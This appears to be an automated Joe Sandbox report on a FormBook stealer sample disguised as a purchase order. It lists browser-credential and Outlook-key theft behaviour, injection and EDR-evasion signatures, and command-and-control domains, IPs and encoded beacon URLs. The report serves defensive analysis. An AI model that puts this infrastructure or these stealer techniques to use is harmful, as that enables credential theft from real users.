                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		412
                Process Injection                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Abuse Elevation Control Mechanism                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572437 Sample: PO2412010.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 28 www.cyperla.xyz 2->28 30 www.070002018.xyz 2->30 32 16 other IPs or domains 2->32 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Yara detected AntiVM3 2->46 50 3 other signatures 2->50 10 PO2412010.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Injects a PE file into a foreign processes 10->62 13 PO2412010.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 duvyEsVvTpq.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 isoburn.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 duvyEsVvTpq.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.070002018.xyz 161.97.142.144, 49729, 49730, 49731 CONTABODE United States 22->34 36 cyperla.xyz 31.186.11.114, 49711, 80 BETAINTERNATIONALTR Turkey 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO2412010.exe37%ReversingLabs
                PO2412010.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.bienmaigrir.info/7yhf/0%Avira URL Cloudsafe
                http://www.dietcoffee.online/dm4p/?Gn6D=5fNLN8qhqB3P&x2q=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AiTCMhthfFHlaAoSHmNs0Z/b09PqcCq4Db34=0%Avira URL Cloudsafe
                http://www.dietcoffee.online/dm4p/0%Avira URL Cloudsafe
                http://www.smartcongress.net/qtfx/0%Avira URL Cloudsafe
                http://www.070002018.xyz/6m2n/0%Avira URL Cloudsafe
                http://www.jalan2.online/ykgd/0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY=0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/0%Avira URL Cloudsafe
                http://www.cyperla.xyz/qygv/?x2q=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wx4OEfkkKpQI8CokgLA8hMMnOvrVSxnOjJsU=&Gn6D=5fNLN8qhqB3P0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/0%Avira URL Cloudsafe
                http://www.smartcongress.net/qtfx/?x2q=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLbzmLeHv/c15PEmolRusqu0oXm0K1+tUNhxI=&Gn6D=5fNLN8qhqB3P0%Avira URL Cloudsafe
                https://www.cstrategy.online/qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC0%Avira URL Cloudsafe
                http://www.yc791022.asia/wu7k/0%Avira URL Cloudsafe
                http://www.smartcongress.net0%Avira URL Cloudsafe
                http://www.jalan2.online/ykgd/?x2q=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/h7/Kfsz1ox4b0pkaI3y+ymEAIYvakOAEmGE=&Gn6D=5fNLN8qhqB3P0%Avira URL Cloudsafe
                http://www.beyondfitness.live/fbpt/?x2q=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqwsClZu7js/9F2ASp2jrUizXePexmAjexZLZ0=&Gn6D=5fNLN8qhqB3P0%Avira URL Cloudsafe
                http://www.beyondfitness.live/fbpt/0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/?x2q=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9khdU1gh7QaWeiWgu/JIX+7JexMxtriwWCLY0=&Gn6D=5fNLN8qhqB3P0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP0%Avira URL Cloudsafe
                http://www.yc791022.asia/wu7k/?x2q=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVPv+PT22eq81M1kOVVHAZEZoSUQiJLk0TbwLs=&Gn6D=5fNLN8qhqB3P0%Avira URL Cloudsafe
                http://www.goldstarfootwear.shop/8m07/0%Avira URL Cloudsafe
                http://www.cstrategy.online/qx5d/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.070002018.xyz
                		161.97.142.144
                		truetrue
                  		unknown
                  www.beyondfitness.live
                  		209.74.77.107
                  		truefalse
                    		unknown
                    goldstarfootwear.shop
                    		3.33.130.190
                    		truefalse
                      		unknown
                      cstrategy.online
                      		194.76.119.60
                      		truefalse
                        		unknown
                        www.madhf.tech
                        		103.224.182.242
                        		truefalse
                          		high
                          smartcongress.net
                          		146.88.233.115
                          		truefalse
                            		unknown
                            www.dietcoffee.online
                            		77.68.64.45
                            		truefalse
                              		high
                              cyperla.xyz
                              		31.186.11.114
                              		truetrue
                                		unknown
                                www.bser101pp.buzz
                                		104.21.64.1
                                		truefalse
                                  		high
                                  www.bienmaigrir.info
                                  		35.220.176.144
                                  		truefalse
                                    		high
                                    www.yc791022.asia
                                    		101.35.209.183
                                    		truefalse
                                      		high
                                      jalan2.online
                                      		108.181.189.7
                                      		truefalse
                                        		unknown
                                        www.cstrategy.online
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.cyperla.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.jalan2.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.goldstarfootwear.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.alihones.lol
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.smartcongress.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.bienmaigrir.info/7yhf/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.smartcongress.net/qtfx/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yc791022.asia/wu7k/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dietcoffee.online/dm4p/?Gn6D=5fNLN8qhqB3P&x2q=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AiTCMhthfFHlaAoSHmNs0Z/b09PqcCq4Db34=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jalan2.online/ykgd/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dietcoffee.online/dm4p/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bser101pp.buzz/v89f/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.cyperla.xyz/qygv/?x2q=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wx4OEfkkKpQI8CokgLA8hMMnOvrVSxnOjJsU=&Gn6D=5fNLN8qhqB3Pfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.070002018.xyz/6m2n/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.madhf.tech/6ou6/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.smartcongress.net/qtfx/?x2q=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLbzmLeHv/c15PEmolRusqu0oXm0K1+tUNhxI=&Gn6D=5fNLN8qhqB3Pfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.goldstarfootwear.shop/8m07/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jalan2.online/ykgd/?x2q=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/h7/Kfsz1ox4b0pkaI3y+ymEAIYvakOAEmGE=&Gn6D=5fNLN8qhqB3Pfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.beyondfitness.live/fbpt/?x2q=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqwsClZu7js/9F2ASp2jrUizXePexmAjexZLZ0=&Gn6D=5fNLN8qhqB3Pfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.beyondfitness.live/fbpt/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.cstrategy.online/qx5d/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bser101pp.buzz/v89f/?x2q=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9khdU1gh7QaWeiWgu/JIX+7JexMxtriwWCLY0=&Gn6D=5fNLN8qhqB3Pfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yc791022.asia/wu7k/?x2q=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVPv+PT22eq81M1kOVVHAZEZoSUQiJLk0TbwLs=&Gn6D=5fNLN8qhqB3Pfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabisoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.cstrategy.online/qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RCisoburn.exe, 00000006.00000002.3837163739.00000000051C6000.00000004.10000000.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000002.3835836980.0000000003A16000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.smartcongress.netduvyEsVvTpq.exe, 00000009.00000002.3838073640.0000000005973000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO2412010.exe, 00000000.00000002.1432296932.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajPduvyEsVvTpq.exe, 00000009.00000002.3835836980.0000000003BA8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      101.35.209.183
                                                                      		www.yc791022.asiaChina
                                                                      		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                      77.68.64.45
                                                                      		www.dietcoffee.onlineUnited Kingdom
                                                                      		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                      146.88.233.115
                                                                      		smartcongress.netFrance
                                                                      		53589PLANETHOSTER-8CAfalse
                                                                      161.97.142.144
                                                                      		www.070002018.xyzUnited States
                                                                      		51167CONTABODEtrue
                                                                      209.74.77.107
                                                                      		www.beyondfitness.liveUnited States
                                                                      		31744MULTIBAND-NEWHOPEUSfalse
                                                                      108.181.189.7
                                                                      		jalan2.onlineCanada
                                                                      		852ASN852CAfalse
                                                                      31.186.11.114
                                                                      		cyperla.xyzTurkey
                                                                      		199484BETAINTERNATIONALTRtrue
                                                                      103.224.182.242
                                                                      		www.madhf.techAustralia
                                                                      		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                      194.76.119.60
                                                                      		cstrategy.onlineItaly
                                                                      		202675KELIWEBITfalse
                                                                      104.21.64.1
                                                                      		www.bser101pp.buzzUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      35.220.176.144
                                                                      		www.bienmaigrir.infoUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      3.33.130.190
                                                                      		goldstarfootwear.shopUnited States
                                                                      		8987AMAZONEXPANSIONGBfalse

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1572437
                                                                      Start date and time:2024-12-10 15:13:11 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 11m 1s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:13
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PO2412010.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/1@19/12
                                                                      EGA Information:
                                                                      • Successful, ratio: 75%
                                                                      HCA Information:
                                                                      • Successful, ratio: 96%
                                                                      • Number of executed functions: 208
                                                                      • Number of non-executed functions: 282
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target duvyEsVvTpq.exe, PID 6740 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • VT rate limit hit for: PO2412010.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      09:14:17API Interceptor39x Sleep call for process: PO2412010.exe modified
                                                                      09:15:37API Interceptor8289809x Sleep call for process: isoburn.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      101.35.209.183Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.yc791022.asia/31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs
                                                                      Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                      • www.yc791022.asia/31pt/
                                                                      Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.yc791022.asia/wu7k/
                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • www.yc791022.asia/31pt/
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • www.yc791022.asia/wu7k/
                                                                      PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                      • www.yc791022.asia/grmn/
                                                                      77.68.64.45NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.dietcoffee.online/ugyg/
                                                                      Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.dietcoffee.online/dm4p/
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • www.dietcoffee.online/dm4p/
                                                                      146.88.233.115NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.smartcongress.net/m1g9/
                                                                      Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.smartcongress.net/qtfx/
                                                                      W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.smartcongress.net/11t3/
                                                                      Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.smartcongress.net/11t3/
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • www.smartcongress.net/qtfx/
                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                      • www.smartcongress.net/11t3/
                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                      • www.smartcongress.net/11t3/
                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                      • www.smartcongress.net/11t3/
                                                                      161.97.142.144New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                      • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                      Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.070002018.xyz/6m2n/
                                                                      Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                      • www.030002613.xyz/xd9h/
                                                                      Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.030002449.xyz/cfqm/
                                                                      PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                      • www.070001955.xyz/7zj0/
                                                                      W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.54248711.xyz/jm2l/
                                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.030002613.xyz/xd9h/
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • www.070002018.xyz/6m2n/
                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                      • www.54248711.xyz/jm2l/
                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                      • www.54248711.xyz/jm2l/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.madhf.techDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.224.182.242
                                                                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 103.224.182.242
                                                                      BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                      • 15.204.67.7
                                                                      Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 103.224.182.242
                                                                      Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 103.224.182.242
                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      www.beyondfitness.liveQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 209.74.77.107
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.107
                                                                      www.070002018.xyzQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 161.97.142.144
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • 161.97.142.144
                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 161.97.142.144

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ONEANDONE-ASBrauerstrasse48DEtmpCA68.HtM.htmGet hashmaliciousUnknownBrowse
                                                                      • 82.223.161.12
                                                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                      • 62.151.165.56
                                                                      la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 82.223.135.21
                                                                      la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 74.208.219.57
                                                                      https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54Get hashmaliciousPhisherBrowse
                                                                      • 82.223.68.99
                                                                      ithgreat.docGet hashmaliciousUnknownBrowse
                                                                      • 87.106.68.207
                                                                      DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                      • 217.160.0.113
                                                                      NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 217.160.0.200
